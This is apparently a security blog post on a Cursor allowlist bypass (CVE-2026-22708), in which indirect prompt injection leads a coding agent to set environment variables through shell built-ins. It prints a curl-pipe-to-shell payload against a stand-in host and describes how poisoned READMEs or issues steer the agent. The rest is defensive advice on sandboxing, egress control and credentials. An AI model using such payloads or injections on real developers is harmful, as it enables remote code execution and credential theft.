
Cursor's Command Allowlist Failed Open (CVE-2026-22708): Why Agent Safe Mode Is the Wrong Trust Boundary


An AI coding agent running in "safe mode," with its command allowlist set to empty, could still be steered into running arbitrary code on the developer's machine. That is the practical result of CVE-2026-22708, a terminal-allowlist bypass in Cursor that Pillar Security disclosed and Cursor fixed in version 2.3. The allowlist was supposed to be the wall between an agent that proposes commands and an agent that executes them without asking. The wall had a gap wide enough to drive a reverse shell through.

This is bigger than one editor. As of mid-2026, OWASP maps prompt injection to six of the ten categories in its Top 10 for Agentic Applications, and 28 of the 53 agentic projects it tracks are coding agents. The exposure - an autonomous process holding a live shell, reading attacker-influenceable text, on a machine that can reach your source code and your credentials - is now the default shape of how a lot of software gets written.

Here is who needs to act and who does not. If your developers run an agentic coding tool - Cursor, Claude Code, GitHub Copilot agent mode, Windsurf - in any auto-run or "YOLO" setting that executes the model's shell commands without a human clicking approve, and that agent runs on a laptop or CI runner holding deploy keys, cloud tokens, or a live VPN, this is yours and it is current. If your team only uses the agent to draft code in chat and a person runs every command by hand, or you do not run agentic coders at all, file this under "know it exists" and move on. The danger lives in the auto-execution step, not in the model being clever.

What actually broke in Cursor

Cursor's allowlist validated external commands - the binaries on disk - against an approved set before the agent could run them. Shell built-ins never touched that check. Commands like export, unset, typeset, declare, readonly, and local run inside the shell process itself rather than as separate executables, so they ran without appearing in the allowlist and without prompting the user. Pillar's writeup states it directly: even when the allowlist is empty, environment variables can still be modified without asking the user for consent.
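The gap is easy to see from the shell itself. The sketch below is a hypothetical helper, not Cursor's code: command_kind (a name invented here) asks the shell how it would resolve a word and reports whether a binary on disk is involved at all. A check that only vets binaries has nothing to inspect for the "shell-internal" group.

```shell
# Hypothetical helper: report how the current shell resolves a command word.
# "external" means a file on disk; "shell-internal" covers built-ins,
# keywords, functions, and aliases, none of which exist as a binary to vet.
command_kind() {
  resolved=$(command -v "$1" 2>/dev/null) || { echo "not-found"; return 0; }
  case "$resolved" in
    /*) echo "external" ;;        # command -v printed an absolute path
    *)  echo "shell-internal" ;;  # command -v printed a name or alias definition
  esac
}

# Compare a few of the built-ins named above with an ordinary binary.
for word in export unset readonly sh; do
  printf '%-10s %s\n' "$word" "$(command_kind "$word")"
done
```

On a typical system the built-ins report as shell-internal while sh resolves to a path, which is the distinction an allowlist of executables cannot see.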

That is enough to win. A built-in that sets an environment variable changes how every later "trusted" command behaves. Point PAGER at an attacker command and the next innocent git log hands off control. Re-order PATH so a planted git binary resolves first. Chain interpreter-level variables - PYTHONWARNINGS, BROWSER, PERL5OPT - and a later script ends up executing injected Perl. The researchers also showed a zero-approval path through zsh's evaluate-on-expansion behavior. The shape of the attack:

# Illustrative (CVE-2026-22708). 'export' is a shell built-in, so Cursor's
# allowlist check never sees it - no prompt, even with an empty allowlist.
export PAGER='sh -c "curl -s https://attacker.example/x | sh"'

# Later the agent runs a command everyone treats as safe:
git log          # git pipes its output through $PAGER -> attacker code runs
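The PATH variant can be reproduced harmlessly. The following is a minimal sketch, assuming a POSIX shell and a writable, executable temp directory; demo_path_shadow and the marker script are invented for illustration and only print a word.

```shell
# Harmless demonstration: a PATH change made by a built-in decides which
# "git" a later command resolves to. Runs in a subshell, so the caller's
# PATH is untouched, and everything lives in a throwaway directory.
demo_path_shadow() (
  planted_dir=$(mktemp -d) || exit 1

  # Stand-in for an attacker's binary; it only prints a marker.
  printf '#!/bin/sh\necho planted\n' > "$planted_dir/git"
  chmod +x "$planted_dir/git"

  # The step an allowlist of binaries never sees: export is a built-in.
  export PATH="$planted_dir:$PATH"

  # The "trusted" command now resolves to the planted file.
  git --version
  status=$?

  rm -rf "$planted_dir"
  exit "$status"
)

demo_path_shadow   # prints: planted
```

Nothing in the final git --version call looks suspicious on its own, which is why inspecting commands one at a time does not catch the change.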

The delivery vector is indirect prompt injection. The attacker never types these commands; the model emits them after reading them out of something the agent was pointed at - a poisoned README, a dependency's post-install notes, a GitHub issue, a web page the agent fetched to "research" a task. SC Media described the outcome as stealthy remote code execution. Cursor's 2.3 release closes the specific hole by requiring explicit approval for any command its server-side parser cannot confidently classify.
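The fix as described is a fail-closed default: anything not confidently recognized goes to a human. A minimal sketch of that default follows, assuming a hypothetical decide function and a made-up list of exact command lines. It is not Cursor's parser, whose internals are not described here.

```shell
# Hypothetical fail-closed gate. Only exact, known command lines return
# "run"; everything else, including built-ins and chained commands,
# falls through to "ask".
decide() {
  case "$1" in
    "pwd"|"ls"|"git status") echo "run" ;;
    *) echo "ask" ;;
  esac
}

decide 'git status'            # run
decide 'export PAGER=anything' # ask
decide 'git status; curl x'    # ask
```

Even a "run" decision inherits whatever environment earlier commands left behind, so a gate like this complements isolation rather than replacing it.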

Why an allowlist is the wrong control here

An allowlist works when the set of safe actions is closed and you can name every member. A shell is the opposite of closed. Built-ins, aliases, functions, environment variables, and word expansion give you an open-ended supply of ways to turn one approved command into a different action. You cannot enumerate that supply, which means any allow-by-name scheme for a shell fails open the first time someone finds the member you forgot to list.

Agentic tools sharpen the problem in a specific way: the attacker controls the input the model reasons over. A normal program runs the code its developer wrote. An agent runs the code a probabilistic model produces after reading text an attacker may have planted upstream. Simon Willison's "lethal trifecta" names the dangerous combination - access to private data, exposure to untrusted content, and a way to send data out - and a coding agent on a developer laptop usually has all three at once. The allowlist was refereeing a game whose rules the attacker gets to rewrite mid-play.

So "which commands do I allow?" is the wrong design question. Ask instead "what can this process touch if the model is fully attacker-controlled?" Assume the agent will, at some point, run something you never intended. Then make that event boring.

The pattern is bigger than one bug

CVE-2026-22708 is one instance of a class. In March 2026 a backdoored build of LiteLLM, the gateway many agent frameworks route through, sat on PyPI for roughly three hours and was pulled down about 47,000 times before removal - every install handing an autonomous process to whoever planted it. In 2025 a coding assistant deleted a company's production database with no attacker involved at all, just an agent acting on its own confused plan. The throughline is that an autonomous agent with real reach turns ordinary mistakes and ordinary injection into production incidents. Treating each new editor CVE as a one-off patch misses that the category itself is the exposure.

Three controls that actually contain a coding agent

Containment, not classification, is what holds. Three controls, in priority order.

1. Run it in a sandbox with nothing of yours in it

Put the agent in a container or disposable VM whose filesystem holds only the repository it needs. No mounted home directory, no SSH keys, no ~/.aws, no kubeconfig. The Cursor researchers reached the same conclusion: give agents full command execution inside an isolated environment and stop pretending an allowlist can sort safe from unsafe. A minimal Docker profile to start from:

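# Flags, in order: no outbound network by default (open specific routes
# separately), all Linux capabilities dropped, no privilege escalation,
# read-only root filesystem with a tmpfs /tmp, and only the repo writable.
# Comments sit up here because a comment after a trailing backslash
# breaks the line continuation.
docker run --rm -it \
  --network none \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --read-only \
  --tmpfs /tmp \
  -v "$PWD":/work:rw -w /work \
  agent-sandbox:latest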
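One way to confirm the sandbox really holds nothing of yours is a pre-flight check run inside it. This is a sketch under stated assumptions: find_credential_paths is a hypothetical name, and the three locations are just the ones named above (SSH keys, ~/.aws, kubeconfig), not an exhaustive list.

```shell
# Hypothetical pre-flight check: print well-known credential locations
# that exist under a given home directory. Inside a clean sandbox the
# expected result is no output at all.
find_credential_paths() {
  home_dir=$1
  for rel in .ssh .aws .kube/config; do
    if [ -e "$home_dir/$rel" ]; then
      echo "$home_dir/$rel"
    fi
  done
}

# Only path names are printed, never file contents.
find_credential_paths "${HOME:-/root}"
```

Any line of output means a mount or image layer leaked something into the container and the profile needs another look before the agent runs.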

2. Control egress, do not just hope for it

Exfiltration and second-stage download both need the network. Default the sandbox to no outbound, then allow only the registries the build genuinely needs - your package mirror, the language toolchain - through a proxy you log. When the agent reaches for an address that is not on that short list, you have a signal worth alerting on rather than a quiet beacon you find weeks later.
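The policy itself is small enough to sketch. The example below assumes a hypothetical egress_decision function of the kind a logging proxy might call per request; both hostnames are placeholders, not recommendations.

```shell
# Hypothetical egress policy check. The listed hosts are placeholders
# standing in for a package mirror and a toolchain registry.
egress_decision() {
  case "$1" in
    pypi.internal.example|registry.internal.example)
      echo "allow" ;;
    *)
      # Anything off the short list is denied and reported on stderr,
      # which is where an alerting pipeline would pick it up.
      echo "deny"
      echo "ALERT egress to unlisted host: $1" >&2 ;;
  esac
}

egress_decision pypi.internal.example   # allow
egress_decision attacker.example        # deny, plus an alert line on stderr
```

The point of the design is the default branch: an unlisted destination produces both a refusal and a record.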

3. Give it ephemeral, least-privilege credentials

The agent should never hold a long-lived deploy key or a standing cloud admin token. Issue short-lived, scoped credentials for the single task and keep production access out of the blast radius entirely. Meta's "Agents Rule of Two" is a workable heuristic: of the three properties - acts on untrusted input, has access to sensitive systems, can change state or send data out - let an agent hold at most two without a human in the loop. A coding agent reading the open internet and holding your cloud keys has all three.
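The heuristic reduces to counting. A minimal sketch, assuming a hypothetical rule_of_two function that takes the three properties as 1 or 0 in the order listed above:

```shell
# Hypothetical check for the "at most two of three" heuristic.
# Each argument is 1 (true) or 0 (false):
#   $1 acts on untrusted input
#   $2 has access to sensitive systems
#   $3 can change state or send data out
rule_of_two() {
  held=$(( $1 + $2 + $3 ))
  if [ "$held" -le 2 ]; then
    echo "ok"
  else
    echo "needs-human"
  fi
}

rule_of_two 1 1 1   # agent reading the open internet with cloud keys: needs-human
rule_of_two 1 0 1   # same agent in a credential-free sandbox: ok
```

Removing credentials from the agent's reach is what moves the first case into the second.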

What to check before your next sprint

Concrete, in order of payoff:

  • Inventory auto-run. Find every developer who has turned on auto-run or auto-approve in Cursor, Claude Code, Copilot agent mode, or Windsurf. That setting, not the vendor name, is the risk you are managing.
  • Patch Cursor. Any version before 2.3 is exposed to CVE-2026-22708; move to 2.3 or later per the vendor advisory.
  • Get agents off privileged machines. An agent on the same laptop that holds a prod VPN session and your cloud credentials is the worst case. Move it into a sandbox before you tune anything else.
  • Scrub the environment. Secrets living in environment variables are readable by any command the agent runs. Pull them out of the agent's environment and inject them only into the human-approved steps that need them.
  • Watch the process tree. Log what runs under your agent. A coding assistant spawning curl, sh -c, or an outbound socket it has no business opening is worth a detection rule today.
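Two of the checks above, scrubbing the environment and watching what runs, can be sketched in a few lines. Both function names and the SANDBOX_HOME variable are hypothetical, and the pattern list is a starting point rather than a complete detection rule.

```shell
# Hypothetical wrapper: run a command with a minimal, fixed environment so
# inherited secrets and a tampered PATH or PAGER do not carry over.
run_scrubbed() {
  env -i PATH="/usr/local/bin:/usr/bin:/bin" HOME="${SANDBOX_HOME:-/tmp}" "$@"
}

# Hypothetical detection filter: read one command line per input line and
# print the ones that start a downloader or an inline shell.
flag_suspicious() {
  grep -E '(^|[ /])(curl|wget|nc)( |$)|(^|[ /])(sh|bash|zsh) -c( |$)' || true
}

# The child process sees none of the caller's variables.
run_scrubbed sh -c 'echo "${AWS_SECRET_ACCESS_KEY:-not visible}"'

# Two of these three lines are flagged; "git status" is not.
printf '%s\n' 'git status' 'curl -s https://attacker.example/x' '/bin/sh -c id' | flag_suspicious
```

In practice the input to a filter like this would come from whatever process logging you already collect under the agent's parent process.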

Run the agent where it cannot reach your secrets

Banning these tools is the wrong call - they earn their keep, and they are not going back in the box. The job is to decide, on purpose, what an agent can touch when, not if, it runs something you never sanctioned. Patch Cursor today. Then take the harder step this quarter: stand up a sandboxed, egress-controlled, credential-starved place for these agents to run, so a poisoned README costs you a thrown-away container instead of your deploy keys. If you are rolling agents out across a team and want a second set of eyes on the blast radius before one of them reads the wrong file, that is a conversation worth having now.
